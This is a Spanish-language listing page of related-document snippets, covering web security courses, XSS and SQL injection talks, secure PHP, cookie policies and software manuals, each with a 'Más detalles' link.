AMECI Asociación Mexicana de Ciberseguridad. Pentesting aplicaciones WEB Versión 2018-V2.0 AM-PTW Modalidad: e-learning Ficha Técnica AMECI Pentesting aplicaciones WEB Versión 2018-V2.0 AM-PTW Modalidad: e-learning Ficha Técnica Datos del Curso Nombre: Pentesting en aplicaciones WEB Duración: 4 semanas Modalidad: e-learning Nivel: Básico-Intermedio

Más detalles

SEGURIDAD BANCARIA Y DE LA INFORMACIÓN Transacciones Seguras Nuestro desafío

SEGURIDAD BANCARIA Y DE LA INFORMACIÓN Transacciones Seguras Nuestro desafío SEGURIDAD BANCARIA Y DE LA INFORMACIÓN Transacciones Seguras Nuestro desafío Arquitecto de Seguridad Actualidad AGENDA Qué nos brindan las tecnologías de la información? Riesgos / Amenazas Vectores de

Más detalles

Bloque I: Seguridad web

Bloque I: Seguridad web 1. Por qué es importante la seguridad? 2. Validación 3. Escapado 4. Ataques XSS 5. Ataques CSRF 5. SQL-Injection 6. Code Injection 7. Session riding Curso de Introducción a PHP 5 *POO = Programación Orientada

Más detalles

Seguridad de un Portal

Seguridad de un Portal Seguridad de un Portal 5 de noviembre, 2010 Gabriel Fernández NyF@agesic.gub.uy Qué debemos proteger? Información Disponibilidad http://moplincom.moplin.com/wp-content/uploads/2009/08/joke-redes1.jpg 2

Más detalles

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014 Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador

Más detalles

Análisis de Tráfico de Datos. para certificar que khipu no recibe las claves bancarias de sus usuarios.

Análisis de Tráfico de Datos. para certificar que khipu no recibe las claves bancarias de sus usuarios. Análisis de Tráfico de Datos para certificar que khipu no recibe las claves bancarias de sus usuarios. Septiembre 2014 1. Contenido Tabla de Contenido 1. Contenido...2 2. Documento...2 3. Introducción...3

Más detalles

Computación Web (Curso 2013/2014)

Computación Web (Curso 2013/2014) Seguridad en Aplicaciones Web (II) Computación Web (Curso 2013/2014) Jesús Arias Fisteus // jaf@it.uc3m.es Seguridad en Aplicaciones Web (II) p. 1 Ataques al almacenamiento de datos Seguridad en Aplicaciones

Más detalles

CURSO DE ETHICAL HACKING

CURSO DE ETHICAL HACKING 1. OBJETIVOS DEL CURSO 1.1. OBJETIVO GENERAL CURSO DE ETHICAL HACKING Brindar a los participantes los conocimientos, técnicas y habilidades utilizadas por hackers para realizar ataques informáticos. 1.2.

Más detalles

Análisis de Tráfico de Datos. para certificar que khipu no recibe las claves bancarias de sus usuarios.

Análisis de Tráfico de Datos. para certificar que khipu no recibe las claves bancarias de sus usuarios. Análisis de Tráfico de Datos para certificar que khipu no recibe las claves bancarias de sus usuarios. Agosto 2014 1. Contenido Tabla de Contenido 1. Contenido...2 2. Documento...2 3. Introducción...3

Más detalles

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net consulting@reyero.net Seguridad en la Web Introducción y objetivos Programa

Más detalles

PROGRAMACIÓN SEGURA EN PHP Héctor A. Mantellini VaSlibre CODIGO LIMPIO CODIGO SEGURO.

PROGRAMACIÓN SEGURA EN PHP Héctor A. Mantellini VaSlibre CODIGO LIMPIO CODIGO SEGURO. CODIGO LIMPIO CODIGO SEGURO La programación segura de PHP es esencial para no comprometer la seguridad de su servidor donde este alojada nuestra aplicación web. Una aplicación con mal diseño de seguridad

Más detalles

Aplicaciones WEB vulnerables: Una puerta de entrada para los intrusos

Aplicaciones WEB vulnerables: Una puerta de entrada para los intrusos Aplicaciones WEB vulnerables: Una puerta de entrada para los intrusos Ing. Dante Santiago Rodríguez Pérez Ing. José Luis Sevilla Rodríguez M. I. Israel Andrade Canales AGENDA Descripción del proceso de

Más detalles

Cómo utiliza Michelin las cookies

Cómo utiliza Michelin las cookies Cómo utiliza Michelin las cookies 1. Qué es una cookie? Una cookie es un archivo de texto, un código o un elemento de software que guarda la información sobre su historial de búsquedas y el modelo de su

Más detalles

Boletín de Consultoría Gerencial Ataques sobre cuentas de redes sociales

Boletín de Consultoría Gerencial Ataques sobre cuentas de redes sociales www.pwc.com/ve Inicio Boletín Digital No. 16-2011 Espiñeira, Sheldon y Asociados - No. 16-2011 Haga click en los enlaces para navegar a través del documento 4Introducción Principales medios de ataques

Más detalles

1. Componentes de la firma digital

1. Componentes de la firma digital Contenido 1. Componentes de la firma digital... 1 2. Requisitos de software para instalación... 2 2.1. Java... 2 2.1.1. Descarga... 2 2.1.2. Instalación... 4 2.1.3. Habilitar plugin Java... 6 3. Firmar

Más detalles

De esta manera, cuando el usuario rellena un campo cómo el siguiente... <input type="text" name="telefono"> </form>

De esta manera, cuando el usuario rellena un campo cómo el siguiente... <input type=text name=telefono> </form> TIPS FORMULARIOS PHP Al enviar un formulario HTML, los datos són enviados al servidor Web y este es capaz de procesarlos y realizar un seguido de acciones en función de los datos introducidos, los datos

Más detalles

ABC de la ciberseguridad. Por: Gizard G.

ABC de la ciberseguridad. Por: Gizard G. ABC de la ciberseguridad Por: Gizard G. Adware Adware Que es? Software publicitario, le permite a un programador ofrecer sus productos de forma gratuita y convertirlos en dinero. Son pagados por una agencia

Más detalles

INFORMACIÓN SOBRE COOKIES

INFORMACIÓN SOBRE COOKIES POLÍTICA DE COOKIES INFORMACIÓN SOBRE COOKIES Debido a la entrada en vigor de la referente modificación de la Ley de Servicios de la Sociedad de la Información (LSSICE) establecida por el Real Decreto

Más detalles

Manual de uso Inventarios App v2

Manual de uso Inventarios App v2 Manual de uso Inventarios App v2 Los siguientes pasos describen como exportar y eliminar los inventarios de la aplicación Inventarios App 2.0 de Intelisystems. 1.- Iniciar Inventario App v2 1.1 Debemos

Más detalles

Sistema Médico Ocupacional SameWeb

Sistema Médico Ocupacional SameWeb Sistema Médico Ocupacional SameWeb 1. Definición El Sistema de Control Médico SameWeb, es una solución de software que permite automatizar las actividades de las unidades de servicio médico ocupacional.

Más detalles